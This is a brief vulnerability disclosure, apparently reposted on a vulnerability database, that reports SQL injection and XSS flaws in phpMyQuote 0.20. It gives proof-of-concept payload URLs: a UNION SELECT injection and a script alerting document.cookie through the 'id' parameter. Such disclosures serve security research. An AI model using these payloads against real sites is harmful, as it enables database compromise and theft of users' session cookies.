Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:17968
HistorySep 11, 2007 - 12:00 a.m.

phpMyQuote 0.20 Version Multiple Sql And Xss Vulnerabilities

2007-09-1100:00:00
vulners.com
10

/////////////// Yollubunlar.org ///////////////

title: phpMyQuote 0.20 Version Multiple Sql And Xss Vulnerabilities

Author : Yollubunlar.Org

Orginal Article: http://yollubunlar.org/phpmyquote-020-version-multiple-sql-and-xss-vulnerabilities-3501.html

MainPage: http://yollubunlar.org/category/web-security

mail : [email protected]

Exploit Sql : http://site.com/script_path/index.php?action=edit&id=[Sql injction]

Example : /index.php?action=edit&id=-1%20union%20select%200,1,2,3,4,5/*

Exploit Xss :http://site.com/script_path/index.php?action=edit&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E

/////////////// Yollubunlar.org ///////////////